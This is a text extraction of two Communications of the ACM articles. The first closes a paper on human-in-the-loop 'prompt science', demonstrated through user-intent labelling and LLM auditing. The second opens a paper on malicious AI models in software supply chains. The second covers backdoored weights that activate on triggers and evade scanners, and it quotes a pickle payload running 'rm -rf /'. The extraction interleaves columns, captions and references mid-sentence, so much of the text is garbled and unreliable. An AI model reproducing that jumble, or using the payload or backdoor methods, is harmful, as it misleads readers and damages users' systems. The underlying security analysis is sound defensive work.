or a set of instructions that produces
Figure 1. A typical flow of prompt engineering for a research process that involves desired outcomes for unseen data. This
labeling data.
is similar to building a codebook in
qualitative research. Take, for instance,
work described in Mitsui et al.17 Here,
the authors were attempting to label
Revision user behaviors (data) with user intents
(discrete labels). For this, they needed
Prompt
to identify a finite (and preferably small)
LLM Response Application set of labels and their desired descrip-
Data tions. This is called a codebook.
They began their process by having
an initial codebook that was inspired
by prior work and literature. But then Figure 2. A typical flow of prompt engineering for a research process that involves
they needed to fine-tune and validate labeling data.
that codebook for the given application,
which they addressed by following the
qualitative coding process depicted in Instructions/
Labels
Figures 2 and 3. Codebook
As shown in the figures, for a typi-
cal qualitative coding process, two re- ICR
searchers who are sufficiently familiar
with the task use the initial codebook
and a small set of data to independently Training Data Labels
provide labels during the training por-
tion. The process continues until there
is good enough agreement, or inter-
coder reliability (ICR), at which point
the codebook is considered ready. It
can then be used by the same or other
researchers to independently and non-
overlappingly label unseen data during Figure 3. Testing portion of qualitative coding.
the testing portion.
It is important to emphasize the
value of iterating with a human in the
loop. During this process, it is not just Revised
Instructions/ Labels
the codebook that is getting revised,
Codebook
but also the understanding of the two
researchers. Through their discus-
sions of disagreements, they are able
to think through the task, the data,
and the best ways to describe that data.
Split 1
This enhanced understanding impacts Testing Data
the codebook and vice versa. In other Split 2 Labels
words, this process is used to both pro-
duce the desired outcome and help the
researchers learn and discover. But this
is not just simple brainstorming. The same or similar experiments by other can tweak the prompt, it is important
researchers are discussing their differ- researchers, by other LLMs, and at dif- to establish that we know how to evalu-
ences and charting their way forward ferent times. We will describe the ab- ate the response. Establishing the cri-
bound by a rigorous set of criteria. For stract process in this section and its op- teria for assessing the outputs outside
instance, in this example, the research- erationalization in the next section. To of the prompt-tuning process ensures
ers were aiming to produce a codebook begin, we list two primary desiderata: the researchers are focused on the task
with categories that were clear, concise, ˲ The desired response from the LLM and not the LLM’s capabilities. A set of
comprehensive, and reliable. They had must be verified along a set of dimen- appropriate criteria could be obtained
specific definitions of these criteria, sions and for a large enough sample from prior work or literature, but these
which they used during their delibera- size by at least two humans. criteria still need to be tested and vali-
tions. This qualitative coding process ˲ The prompt must consistently dated for the given application. More-
ensures that individual subjectivity is generate the desired responses and over, eventually we will need humans
dissolved to the extent possible while must be justifiable, explainable, and to assess whether the LLM is generating
producing a coding scheme that is ro- verifiable. desired responses in order to revise the
bust, verifiable, and explainable. To operationalize these two crite- prompt. For these reasons, we need to
Codebook building as a way to con- ria, we propose a multi-phase process, execute our first human-in-the-loop as-
struct prompts. We will now describe working backward in the pipeline from sessment, involving the following steps:
a new method for prompt generation prompt to application, as shown in Fig- ˲ Run the existing pipeline to gener-
inspired by the qualitative codebook- ure 4. This method has four phases. ate a reasonable number of responses.
building process discussed above. Phase 1: Set up the initial pipeline. Give each assessor these responses,
Once again, our objective is to gener- This can be done using any reasonable the existing set of criteria (codebook),
ate a prompt for a given LLM in order prompt. For instance, the initial prompt and sufficient details about the appli-
to achieve a desired response. We also could be a simple and direct instruction cation. The assessors should review
need this prompt to be systematically to generate the desired response. these outcomes and instructions be-
created with enough generalizability Phase 2: Identify appropriate crite- fore starting their assessment. This
and explainability to be useful for the ria to evaluate the responses. Before we can be supervised by the lead research-
JU N E 2 0 2 5 | VO L. 6 8 | N O. 6 | C OM M U N IC AT ION S OF T HE ACM 57
research and advances
Figure 4. Proposed methodology with multi-phase approach to response and prompt validations.
Prompt
LLM Response Criteria Application
Data
Literature,
Prior Work,
Hypothesis
er or by an expert. Note that due to the Phase 3: Iteratively develop the the process is finished. The assessors
interactive learning and collaboration prompt. Continuing to work backward, or the supervising researcher may still
that takes place among the human we now come to the next phase of co- make minor adjustments to the prompt
assessors (described in the previous debook development, which happens for improved readability, interpretabil-
section), they do not need special qual- to be the first phase of the pipeline de- ity, and generalization.
ifications other than being able to un- picted in Figure 4. The objective here is Phase 4: Validate the whole pipeline.
derstand the task at hand and discuss to see if the LLM, with the current ver- As an optional final validation phase,
their disagreements. sion of the prompt, is meeting our crite- run through the whole pipeline using
˲ Each assessor applies the criteria to ria for the responses. If not, we need to a portion of the test data and evaluate
the given responses independently. figure out what changes can be made to random samples of the responses to en-
˲ Compare the assessors’ outcomes the prompt. sure the entire process still yields qual-
and compute the level of agreement. At this point, we know what makes a ity results that can be independently
This could be as simple as measuring good response from our LLM. More im- and objectively validated. For this, it is
the percentage of times they agree, or portantly, we have now trained at least ideal to use a different set of assessors
using ICR with an appropriate method, two researchers in reasonably, objec- and have them independently label that
such as Cohen’s kappa36 or Krippen- tively, consistently, and independently same set of randomly sampled respons-
dorfff’s alpha.13 evaluating these responses. They can es. Compute their ICR on this sample to
˲ If the amount of agreement is not also more effectively assess which in- see whether there is good enough agree-
sufficient (this could vary from applica- structions can help produce the desired ment among them on labeling, and
tion to application), bring the assessors responses. To iteratively develop the whether the generated responses are
together to discuss their disagreement. prompt, we execute the following steps: meeting the desired criteria. If either
This is a very important step, as it not ˲ Run a reasonable number of data of these objectives are not met, take ap-
only offers an opportunity to remove inputs using the current prompt. propriate corrective actions based on
individual biases and subjectivity, but ˲ Give the generated responses to phases 2 and 3.
also influences researchers’ collective the human assessors, ideally the same As one can see, there are multiple
understanding of the task and the cri- ones who were involved in the previ- checkpoints and validations in this
teria for evaluation. The discussion ous phase. These assessors should use method that ensure removal of ad hoc-
could result in both resolution of the the codebook produced in the previous ness, subjectivity, and opaqueness as
conflict and changes to the codebook, phase to assess the responses. much as possible. A proper documen-
which could be about the number or ˲ Have them assess whether the gen- tation of its execution will yield a more
the description of the criteria for as- erated responses meet the criteria for informative, meaningful, and scien-
sessment. Then, a new set of responses the application in question. Compare tific communication that can help
are generated for assessment using the the assessments by different assessors other researchers trust the outputs as
revised codebook and the above pro- to find their level of agreement. If that well as test and build these pipelines
cess is repeated. agreement is insufficient, have the as- themselves.
˲ Once a sufficient level of agreement sessors discuss their disagreements,
is achieved, the codebook for assessing possibly under the supervision of a se- Demonstrations
the responses is finalized. At this point, nior researcher or an expert, and revise To demonstrate the methodology ex-
the assessors may still choose to make the codebook as necessary. Here, the plained here, we will now walk through
minor changes to the codebook to en- codebook is the prompt fed to the LLM. its execution for two specific research
hance its readability, with the idea that Repeat the above process. applications, resulting from collabo-
anyone who did not participate in this ˲ Once there is enough agreement rations with two different sets of re-
development process can still under- among the assessors that the prompt searchers.
stand and use it in much the same way meets the objective of generating de- Identifying user intents. One of the
the assessors would. sired responses above some threshold, common problems in the areas of in-
formation retrieval and recommender with the testing phase, in which the
systems is that of understanding user LLM was given new data and asked
intents.38 Doing so requires having a to use the human-validated taxono-
taxonomy of user intents and then us- my to label user intents. A set of two
ing this taxonomy to label user queries,
questions, or behaviors with appropri- It is important to different researchers independently
assigned their own labels using the
ate intents. However, as shown by Shah
et al.,28 it is very challenging to con-
emphasize the same taxonomy.
We then compared the labels among
struct and use these intent taxonomies. value of iterating the human annotators, as well as the
Taking one of the existing taxonomies
could help with construction, but may
with a human in the humans and the LLM, finding high
enough ICR for all of them. We repeated
not be sufficiently comprehensive or loop. During this this process with two other LLMs—Mis-
accurate to be applicable. Conversely,
creating a customized taxonomy for a
process, it is not tral and Hermes, both open sourced—
and found their labeling also had
given application could help with appli- just the codebook strong agreements with those obtained
cability, but would incur a high cost.
LLMs could help in constructing and that is getting from GPT4, as well as from the human
annotators. This indicated that both
applying taxonomies, but are faced with revised, but also the taxonomy and the process for using
the understanding
the same challenges described in the that taxonomy through an LLM were
first section, namely, a lack of reliability robust and stable. At this point, we not
and validation, the danger of creating
feedback loops, and issues with repli-
of the two only had a reasonably reliable and ro-
bust pipeline for generating and using
cability and generalizability. To over- researchers. a user-intent taxonomy, but it also had
come these issues, the author, along been validated through a rigorous pro-
with a set of collaborators, applied the cess with a human in the loop, making
method proposed here. The following the pipeline considerably trustworthy
are the specific steps we took based on and generalizable. The details of this
the pipeline presented in Figure 4 and work, along with results and their dis-
described in the previous section. cussions, can be found in Shah et al.29
Phase 1: Set up the initial pipeline. A Auditing an LLM. We now turn to
pipeline that included an initial prompt a different type of problem involving
and a small sample of log data from LLMs: auditing. While there have been
Bing Chat that could create a user-in- many recent efforts in this area,18,22 we
tent taxonomy (zero-shot approach) was still lack systematic and scientifically
set up for initial testing. rigorous approaches. We attempted to
Phase 2: Identify appropriate criteria address this using a simple but effec-
to evaluate the responses. We identified tive method: probing the same ques-
five criteria—comprehensiveness, con- tion differently to the given LLM to see
sistency, clarity, accuracy, and concise- how it responds. Different versions of
ness—for evaluating the quality of a the same question could be generated
user-intent taxonomy using prior work21 by humans, but that would hinder scal-
as well as human assessments, shown ability. Using an LLM (ideally, one oth-
in Figure 4. er than the one being audited) could
Phase 3: Iteratively develop the help (as shown in Rastogi et. al22) but,
prompt. We first ran the zero-shot ap- like before, we are faced with the chal-
proach to obtain the initial taxonomy. lenge of ensuring that the generation
Two researchers familiar with the task of those probes is reliable, robust, and
of creating and using a user-intent generalizable. To meet these challeng-
taxonomy assessed the generated tax- es, we again ran through the proposed
onomy through those five criteria. Ap- method in the codebook-building sec-
propriate revisions were made in the tion above.
original prompt and a new sample of Phase 1: Set up the initial pipeline. The
data was passed through the LLM (here, initial prompt for the LLM was “Gen-
GPT4) to create a new version of the erate five different questions for the
taxonomy. The researchers repeated following question that represent the
the process until they obtained a good same meaning, but are different.” We
agreement (ICR9). used the Mistral LLM and the data we
Phase 4: Validate the whole pipeline. used for the original questions came
Once the taxonomy was finalized (see from the TruthfulQA dataset.14 Given
details in Shah et al.29), we proceeded the application—generating different
JU N E 2 0 2 5 | VO L. 6 8 | N O. 6 | C OM M U N IC AT ION S OF T HE ACM 59
research and advances
versions of the same question for au- generation tools5 that are effective at
diting an LLM—we set the criteria for predicting next tokens. But for many re-
responses generated by Mistral as rel- searchers, they are proving to be useful
evance and diversity. in many research problems that involve
Phase 2: Identify appropriate criteria
to evaluate the responses. We recruited The approach labeling or classifying input data based
on some analysis or reasoning. How-
two researchers who understood the
application well. Using the existing
itself does not ever, using LLMs blindly for these re-
search tasks, just because their outputs
literature and the task at hand, we de- guarantee removal seem reasonable, can be dangerous. It
termined that a good set of probes will
have two important characteristics: rel-
of individual biases. can perpetuate biases,26 create fabricat-
ed or hallucinated responses,23 and pro-
evance or semantic similarity of each Rather, it promotes vide unverifiable results.32 All of these
probe with the original question and
adequate diversity among the probes.
counteracting are harmful for scientific progress.
Creatively or iteratively designing
As the two researchers started indepen- them by engaging prompts to produce desirable out-
dently assessing the generated probes
from a small set of data (10 original multiple comes—what is often referred to as
prompt engineering—does not address
questions that resulted in 50 probes) researchers in these concerns. In fact, prompt engi-
a well-defined
and then comparing their labels with neering may even worsen the problems
each other, two key things happened: by focusing too much on bending the
They started firming up the defini-
tions of relevance and diversity, and
process with process to generate the desired out-
comes than on developing a verifiable,
they started getting more agreements objective criteria. validated, and replicable process. In
with their assessments. We had to go this article, we showed how prompt en-
through three rounds of this exercise to gineering can be turned into or aided
finalize our definitions of the two crite- by prompt science by introducing a
ria, as well as how to label them. multi-phase process with a human in
Phase 3: Iteratively develop the the loop. Specifically, we divided the
prompt. We wanted to have a prompt prompt-to-application pipeline into two
that consistently generates outputs (a major phases that provide two levels of
set of questions) that could achieve high verification: one for the criteria for eval-
enough relevance and diversity for their uating the responses generated by the
use in a downstream application. We set LLM, and the other for the prompt used
the threshold for this at 75%. The same to generate the responses. Through a
two researchers marked the generated method inspired by qualitative coding
responses for relevance and diversity for codebook development, we showed
using a new set of input data. The initial how to have scientific rigor in devel-
round of assessment showed that only oping a reliable prompt and getting a
about 50% of the outcomes met the goal trustworthy response for a downstream
of relevance (medium or high) and diver- application. We demonstrated this
sity. To change this, the original prompt method in two different applications:
was modified to include more details generating and using a user-intent tax-
about the application and the criteria. onomy and auditing an LLM.
This process was then repeated. After We believe there are three main rea-
two more iterations, the LLM was gen- sons this method provides scientific
erating outcomes that were relevant and rigor:
diverse for at least 80% of the cases. ˲ It offers a systematic and scientifi-
Phase 4: Validate the whole pipeline. cally verifiable way of producing prompt
A senior researcher tested the whole templates, while potentially reducing
pipeline with the final versions of the individual subjectivity and biases. Note
prompt and the criteria with a few that the approach itself does not guar-
rounds of random samplings. They antee removal of individual biases.
made a few minor adjustments to the Rather, it promotes counteracting them
prompt for improved readability and by engaging multiple researchers in
generalizability. The details of these ex- a well-defined process with objective
periments, along with a demo, can be criteria. This is a known benefit of the
found in Amirizaniani et al.1,2 qualitative coding process.4
˲ Through the involvement of mul-
Conclusion tiple researchers documenting their
LLMs could simply be stochastic string- deliberations and decisions, it fosters
openness and replicability. This docu- experiments described in the “Identi- 19. Paroiu, R. et al. Asking questions about scientific
articles—Identifying large N studies with LLMs.
mentation can and should be made fying user intents” section are results Electronics 12, 19 (2023), 3996.
available, much like the code for an of collaboration with Ryen White and 20. Peng, L. et al. Generating efficient training data via
LLM-based attribute manipulation. arXiv preprint
open source tool, allowing other re- other researchers from Microsoft, as arXiv:2307.07099 (2023).
searchers to validate, replicate, and listed in Shah et al.29 The LLM auditing 21. Raad, J. and Cruz, C. A survey on ontology evaluation
methods. In Proceedings of the Intern. Conf. on
extend the work. Engaging multiple experiments described in the “Audit- Knowledge Engineering and Ontology Development,
researchers in constructing and apply- ing an LLM” section are results of hard part of the 7th Intern. Joint Conf. on Knowledge
Discovery, Knowledge Engineering and Knowledge
ing objectively defined labels also helps work by Maryam Amirizaniani, Adrian Management (2015).
break the feedback loop or self-fulfilling Lavergne, Elizabeth Okada, and Jihan 22. Rastogi, C. et al. Supporting human-AI collaboration
in auditing LLMs with LLMs. In Proceedings of the
prophecy in which a single researcher Yao. We are also thankful to Aman 2023 AAAI/ACM Conf. on AI, Ethics, and Society. ACM
(2023), 913–926.
tweaks the prompt to an LLM to achieve Chadha and Tanya Roosta for their 23. Rawte, V. et al. A survey of hallucination in large
desired results. valuable comments and guidance dur- foundation models. arXiv preprint arXiv:2309.05922
˲ In addition to producing a prompt (2023).
ing this process. 24. Reynolds, L. and McDonell, K. Prompt programming
template that can generate desired out- for large language models: Beyond the few-shot
paradigm. In Extended Abstracts of the 2021 CHI
comes reliably and consistently, the pro- References
Conf. on Human Factors in Computing Systems. ACM
1. Amirizaniani, M. et al. AuditLLM: A tool for auditing
cess also adds to our knowledge about large language models using multiprobe approach.
(2021), 1–7.
25. Sahoo, P. et al. A systematic survey of prompt
the problem at hand (application), how In Proceedings of the 33rd ACM Intern. Conf. on
engineering in large language models: Techniques and
Information and Knowledge Management. ACM
to best assess what we need for that (2024), 5174–5179.
applications. arXiv:2402.07927 (2024); https://arxiv.
org/abs/2402.07927
problem, and how we can consistently 2. Amirizaniani, M. et al. Developing a framework for
26. Shah, C. and Bender, E.M. Situating search. In
auditing large language models using human-in-the-
and objectively analyze the given data. loop. arXiv preprint arXiv:2402.09346 (2024).
Proceedings of the 2022 Conf. on Human Information
Interaction and Retrieval. ACM (2022), 221–232.
This rigorous process comes at a 3. Antu, S.A., Chen, H., and Richards, C.K.. Using LLM
27. Shah, C. and Bender, E.M. Envisioning information access
(Large Language Model) to improve efficiency in
cost. Comparing the typical process of systems: What makes for good tools and a healthy web?
literature review for undergraduate research. LLM@
ACM Trans. on the Web 18, 3 (2024), 1–24.
prompt engineering (Figure 1) with the AIED (2023), 8–16.
28. Shah, C. et al. Taking search to task. In Proceedings
4. Auerbach, C. and Silverstein, L.B. Qualitative Data:
proposed method of prompt science of the 2023 ACM Conf. on Human Information
An Introduction to Coding and Analysis, Vol. 21. NYU
Interaction and Retrieval. ACM (2023), 1–13.
(Figure 4), there is at least a threefold Press (2003).
29. Shah, C. et al. Using large language models to
5. Bender, E.M. et al. On the dangers of stochastic parrots:
generate, validate, and apply user intent taxonomies.
cost increase. Guided deliberations and Can language models be too big?. In Proceedings of
ACM Trans. on the Web (forthcoming).
the 2021 ACM Conf. on Fairness, Accountability, and
detailed documentation can also add Transparency. ACM (2021), 610–623.
30. Shah, N.H., Entwistle, D., and Pfeffer, M.A.. Creation
and adoption of large language models in medicine.
to the cost. Finally, the optional phase 6. Cain, W. Prompting change: Exploring prompt
JAMA 330, 9 (2023), 866–869.
engineering in large language model AI and its
4 adds a lightweight but more continual potential to transform education. TechTrends 68, 1
31. Shen, H. et al. Shaping the emerging norms of using
large language models in social computing research.
cost to the whole pipeline to maintain (2024), 47–57.
In Companion Publication of the 2023 Conf. on
7. Chen, B., Yi, F., and Varró, D. Prompting or fine-tuning?
its quality and validity. We can compare A comparative study of large language models for
Computer Supported Cooperative Work and Social
Computing. ACM (2023), 569–571.
this to an assembly line that is run pri- taxonomy construction. In 2023 ACM/IEEE Intern.
32. Stechly, K., Marquez, M., and Kambhampati, S. GPT-4
Conf. on Model Driven Engineering Languages and
marily through automated processes Systems Companion. IEEE (2023), 588–596.
doesn’t know it’s wrong: An analysis of iterative
prompting for reasoning problems. In NeurIPS 2023
with some human supervision. De- 8. Chew, R. et al. LLM-assisted content analysis: Using
Foundation Models for Decision Making Workshop.
large language models to support deductive coding.
pending on the risk of bad quality and arXiv preprint arXiv:2306.14924 (2023).
33. Strobelt, H. et al. Interactive and visual prompt
engineering for ad hoc task adaptation with large
the cost of the manual quality check, 9. Cohen, J. A coefficient of agreement for nominal
language models. IEEE Trans. on Visualization and
scales. Educational and Psychological Measurement
one could decide how often and how Computer Graphics 29, 1 (2022), 1146–1156.
20, 1 (1960), 37–46.
34. Thomas, P. et al. Large language models can
rigorously humans should be involved. 10. Ding, N. et al. Parameter-efficient fine-tuning of large-
accurately predict searcher preferences. In
scale pre-trained language models. Nature Machine
This then allows us to create more au- Proceedings of the 47th Intern. ACM SIGIR Conf.
Intelligence 5, 3 (2023), 220–235.
on Research and Development in Information. ACM
tomated systems with enough control 11. Gómez-Rodríguez, C. and Williams, P. A Confederacy
(2024), 1930–1940.
of models: A comprehensive evaluation of LLMs on
35. Vert, J.-P. How will generative AI disrupt data science
and quality assurance—going from co- creative writing. In Proceedings of the 2023 Conf. on
in drug discovery? Nature Biotechnology 41, (2023),
Empirical Methods in Natural Language Processing.
pilot to autopilot mode with LLMs. The ACL (2023).
750–751.
36. Warrens, M.J. Five ways to look at Cohen’s kappa. J. of
key, as argued and demonstrated here, 12. Hu, Z. et al. LLM-adapters: An adapter family for
Psychology & Psychotherapy 5 (2015).
parameter-efficient fine-tuning of large language
is to do so with enough human agency models. In Proceedings of the 2023 Conf. on Empirical
37. Ye, Q. et al. Prompt engineering a prompt engineer.
In Findings of the Association for Computational
and scientific rigor. Methods in Natural Language Processing. ACL (2023),
Linguistics. ACL (2024), 355–385.
5254–5276.
Even if the goal is not to create a fully 13. Krippendorff, K. Computing Krippendorff’s alpha-
38. Zhang, P. et al. Efficiently leveraging multi-level user
intent for session-based recommendation via atten-
automated pipeline, considering that reliability. (2011).
mixer network. In Proceedings of the Sixteenth ACM
14. Lin, S., Hilton, J., and Evans, O. TruthfulQA: Measuring
the proposed method not only leads how models mimic human falsehoods. In Proceedings
Intern. Conf. on Web Search and Data Mining. ACM
(2023), 168–176.
to outputs with higher quality, consis- of the 60th Annual Meeting of the Association for
39. Zhao, P. et al. Retrieval-augmented generation for AI-
Computational Linguistics (Volume 1: Long Papers).
tency, and reliability, but also an in- ACL (2022), 3214-3252.
generated content: A survey. CoRR (2024).
40. Ziems, C. et al. Can large language models transform
creased understanding of the task and 15. Lindemann, N.F. Sealed knowledges: A critical
computational social science? Computational
approach to the usage of LLMs as search engines.
the data, we believe the added cost is Linguistics 50, 1 (2023), 1–53.
In Proceedings of the 2023 AAAI/ACM Conf. on AI,
justifiable. The broader scientific com- Ethics, and Society. ACM (2023), 985–986.
16. Ma, P. et al. InsightPilot: An LLM-empowered Chirag Shah ([email protected]) is a professor in the
munity could also benefit from exercis- automated data exploration system. In Proceedings Information School at the University of Washington,
ing and perhaps insisting on such rigor of the 2023 Conf. on Empirical Methods in Natural Seattle, USA.
Language Processing. ACL (2023), 346–352.
so we can leverage LLMs ethically and 17. Mitsui, M., Shah, C., and Belkin, N.J. Extracting
information seeking intentions for web search
responsibly in our research. sessions. In Proceedings of the 39th Intern. ACM
This work is licensed under a Creative
SIGIR Conf. on Research and Development in
Commons Attribution-NonCommercial-
Information Retrieval. ACM (2016), 841–844.
Acknowledgments 18. Mökander, J. et al. Auditing large language models: a
ShareAlike International 4.0 License.
The taxonomy generation and usage three-layered approach. AI and Ethics (2023), 1–31. © 2025 Copyright held by the owner/author(s).
JU N E 2 0 2 5 | VO L. 6 8 | N O. 6 | C OM M U N IC AT ION S OF T HE ACM 61
research and advances
DOI:10.1145/ 3704724
the primary methods of introducing
Unveiling the dark side. malicious AI models into the software
supply chain. Developers often rely on
BY ADITYA K. SOOD AND SHERALI ZEADALLY libraries and frameworks to import
pre-trained AI models to expedite soft-
Malicious
ware development. Attackers can easily
compromise the underlying system if
the application consumes pre-trained
AI models tainted with malicious code.
For instance, the MLOps platform20
AI Models
fails to detect malicious AI models af-
ter scanning the model file containing
serialized data. Deploying a malicious
AI model would jeopardize the security
Undermine
of the systems and could put end users
at risk in some applications.
The sophistication of these mali-
cious AI models allows them to adapt
Software
and evade traditional security mea-
sures by leveraging their ability to ana-
lyze vast amounts of data, learn com-
plex patterns, and generate responses
that mimic human behavior. These
Supply-Chain
malicious AI models can simulate di-
verse attack scenarios, discover previ-
ously unknown vulnerabilities, and
create evasive techniques that tradi-
Security
tional defenses, reliant on predefined
signatures and heuristics, struggle to
detect. It is also important to note that
adversaries can exploit vulnerabilities
in the AI framework or the environ-
key insights
˽ Attackers inject malicious code into AI
models hosted on the public repositories.
These models allow attackers to
manipulate or exploit the environment
when deployed in software systems.
models6 into software
I N T EGR AT I NG M A L ICIOUS A I Incorporating malicious AI models
in dependencies or libraries also
supply chains presents a significant and emerging compromises the integrity of software
threat to cybersecurity. The attackers aim to embed products downstream.
performs actions such as exfiltrating sensitive data, ˽ Organizations need robust processes
manipulating data integrity, or enabling unauthorized to validate the origin and integrity of AI
models. Organizations should use trusted
access to critical systems. Compromised development repositories, cryptographic validation,
and controlled access to mitigate risks
tools, tampered libraries, and pre-trained models are associated with third-party AI models.
ment when the AI model is deployed, execution by containing any harmful different stages of development, from
such as weaknesses in deserialization behavior within a controlled space. training to maintenance control over
processes or insufficient validation Despite these solutions, the constantly model versions and updates. Reposito-
checks. This underscores the need for evolving nature of AI-based threats ries such as Hugging Face, TensorFlow
constant vigilance and proactive mea- makes it essential for organizations to Hub, PyTorch Hub, and Model Zoo of-
sures to secure AI systems. Integration continuously adapt and integrate mul- fer additional features over traditional
of AI models without adequate security tiple layers of security by building a model-hosting and version-control
checks can lead to the execution of un- holistic approach to security to defend systems such as GitHub. These fea-
authorized code. AI models, especially against malicious AI models. Overall, tures include model discovery; built-in
those shared via untrusted sources, malicious AI models are programmed tools for model evaluation, including
may contain embedded malicious to recognize and adapt to differ- model training, integrated inference
code or payloads that can be triggered ent security environments. They can application programming interfaces
during execution. Attackers can tam- identify patterns in security protocols (APIs), private model hosting, sharing
per with the model weights, scripts, and learn to avoid detection by mim- pre-trained models; and integration
or dependencies to insert hidden mal- icking normal system behavior. This with various machine learning (ML)
ware or back doors, allowing for unau- adaptability makes them particularly frameworks.
thorized code execution once the mod- dangerous because they can remain The AI model integration process
el is loaded into memory. The absence dormant and undetected for extended involves transferring a pre-trained
of robust security checks, sandboxing, periods, only activating under specific model from an external source or re-
or code-integrity verification can lead conditions to execute their malicious pository into a local development envi-
to arbitrary code execution, underscor- payload. This stealthy nature of at- ronment or application for further use
ing the critical need for stringent secu- tacks using AI complicates incident re- or fine-tuning. This process typically
rity measures. sponse efforts because traditional de- starts by selecting the appropriate
Detecting and mitigating malicious tection methods may not be effective model from a repository, which pro-
AI models is challenging due to their against such advanced cyber threats. vides models in various formats. Once
complexity and opacity. First, AI mod- Research contributions of this selected, the model is downloaded and
els are distributed as opaque files (for work. Considering the above, this ar- loaded into the chosen ML framework,
example, model weights) containing ticle makes the following contribu- such as TensorFlow or PyTorch, using
parameters learned during training. tions. First, we describe the AI model standardized functions or APIs. Dur-
As these parameters can be tampered integration process and discuss threat ing integration, it is crucial to ensure
with, AI models act maliciously when classification and associated attack that the model’s architecture, depen-
specific triggers are activated, making payloads. Second, we present a com- dencies, and input-output configura-
it challenging to distinguish between a plete attack flow model explaining tions are compatible with the existing
benign and compromised model with- how attackers use malicious AI mod- environment. The model may undergo
out deep analysis. Second, AI models els to compromise the target systems. additional steps, such as fine-tuning
rely on external dependencies and Third, we discuss the limitation of tra- domain-specific data, integration
frameworks, and attackers can exploit ditional security defenses to restrict into a larger system, or deployment
vulnerabilities in these libraries to in- the impact of malicious AI models. in a production environment. Under-
troduce malicious payloads. Third, AI Fourth, we discuss recommendations standing the complete AI model inte-
models are deployed in environments with granularity, which organizations gration process is essential to dissect
that lack proper validation or isolation can opt to strengthen software supply- the associated risks and threats. Table
mechanisms, allowing malicious code chain security. 1 presents the workflow of integrating
hidden within a model to execute un- the AI model.
detected. Several existing solutions Understanding the AI Model By following the steps in Table 1, us-
aim to address these issues, such as Integration Process ers can effectively import pre-trained
secure model validation to check the Hosting AI models in a repository is a AI models from repositories for devel-
integrity of models before they are de- crucial aspect of modern AI develop- opment.
ployed. Another key solution is to use ment and deployment.17 The reposito-
a secure model serialization format, ries hosting AI models are centralized Threat Modeling:
such as Safetensors,16 for AI models. locations where models, metadata, Malicious AI Models
This format provides a robust way to dependencies, and documentation Threat modeling10 offers a structured
verify the embedded code, offering a are stored securely, facilitating easy framework for understanding threats.
sense of reassurance about the safety access and collaboration. The AI mod- The primary importance of threat
of the AI models. In addition, model els deployed in the repositories are modeling lies in its proactive nature,
watermarking involves embedding often open source, allowing users to allowing organizations to anticipate
models with unique identifiers to ver- directly deploy them in the produc- and mitigate risks before malicious
ify their source and integrity. Sandbox- tion environment or fine-tune those AI actors can exploit them. The goal is
ing models in isolated execution envi- models for specific use cases. By host- to develop a systematic approach for
ronments is another technique that ing AI models in a repository, organi- identifying, assessing, and addressing
mitigates the risk of malicious code zations can ensure consistency across potential security threats to applica-
tions, systems, or networks. This sec- Table 1. Basic workflow for integrating an AI model from the repository.
tion discusses malicious AI models,
threat classification, attack payloads, Integration Steps Description
and attack flow models specifically for Choose repository Select a repository or platform where the desired pre-trained model is hosted.
malicious AI models impacting soft- Standard repositories include:
ware supply chains. ˲ GitHub: A platform for hosting open source projects, including AI models.
Understanding malicious AI mod- ˲ Hugging Face Model Hub: A repository for hosting and sharing pre-trained
els. A malicious AI model is designed natural language processing models.
or tampered with to cause harm or ˲ TensorFlow Hub: A platform for sharing AI models compatible with the Tensor-
Flow framework.
act against the intended purpose of
˲ PyTorch Hub: A repository for sharing AI models compatible with the PyTorch
the system it’s integrated into. While framework.
many might assume that an AI model
Identify model Select the specific model to import from the repository. Hosted models are
is simply a tool for prediction or classi- organized by task, architecture, or domain.
fication, like predicting sentiment in a
Install required Install the necessary libraries or packages to interact with the repository
text, malicious actors can exploit these
packages and download the model. The list below includes widely used packages or
models in various ways to compromise dependencies.
security, privacy, and integrity. Several ˲ Hugging Face Model Hub: Install the transformers library using pip (pip install
examples of malicious AI models are transformers).
listed below. ˲ TensorFlow Hub: Install TensorFlow and TensorFlow Hub (pip install tensorflow
Embedding malicious code in model tensorflow-hub).
˲ PyTorch Hub: Install PyTorch (pip install torch).
artifacts. To speed up development, a
user downloads a pre-trained model Import model Import the desired model into one’s Python environment using the appropriate
from an online repository. The mod- library or framework.
˲ Hugging Face Model Hub (using transformers library):
el file is embedded with malicious
from transformers import AutoModelForSequenceClassification
code that executes when the model is model = AutoModelForSequenceClassification.from_pretrained
loaded, taking advantage of the load- (“distilbert-base-uncased”)
ing process to infect the system. This ˲ Tensor Hub:
could compromise the system, giving import tensorflow_hub as hub
model = hub.load(“https://tinyurl.com/22ts9aop”)
attackers control over the host ma- ˲ PyTorch Hub:
chine, enabling data exfiltration, or import torch
spreading the malware further. In re- model = torch.hub.load(‘pytorch/vision’, ‘resnet18’, pretrained=True)
al-world scenarios, Python pickle files Verify compatibility ˲ Verify that the model’s input and output formats match the data pipeline. If
have been used to embed malicious necessary, adjust preprocessing steps to ensure compatibility.
code within AI models, exploiting the ˲ Ensure that the local framework and hardware (for example, CPU vs. GPU) sup-
deserialization process in Python. port the model’s layers, activation functions, and other components.
Pickle is a Python-specific serializa- Customize and ˲ Adapt the model to a specific dataset using fine-tuning by continuing training on
tion format for AI models. Still, the fine-tune the data. Modify hyperparameters such as learning rate, batch size, or optimizer
to better suit the training dataset or objectives.
inherent security flaw for trusting the
deserialized data allows the execution Test and optimize ˲ Run tests to ensure the model behaves as expected in the local environment.
of embedded code, creating a serious These tests include validating the model’s accuracy, performance, and response
to operational parameters—including rare and unexpected inputs.
security risk. Researchers demonstrat- ˲ Optimize the model for faster inference, lower memory usage, or deployment
ed how a malicious pickle file could on edge devices. Tools such as TensorFlow Lite, ONNX Runtime, or PyTorch’s
execute arbitrary code during deseri- TorchScript can help with optimization.
alization using the sleepy pickle attack Save the model ˲ Once imported and possibly modified, save the model in a local directory with a
technique.22,23 Listing 1 highlights the transparent versioning scheme that enables tracking changes and reverting to
basic code of a pickle file embedded previous versions if necessary.
with malicious code. Deploy the model ˲ If the model is intended for production, deploy it using appropriate tools and
In the code presented in the listing, frameworks. This involves setting up inference pipelines and scaling strategies.
the pickle.loads() function is called, Inference pipelines cover structured steps an AI model follows to process input
data and generate predictions. Scaling strategies ensure the system handles the
and the embedded malicious com- load by dynamically allocating resources for optimizing inference operations.
mand (os.system ("rm -rf /")) is executed,
causing catastrophic damage, such as
deleting files on the system. When an Listing 1. Example code highlighting malicious payload in a pickle object.
AI model is executed using the mali-
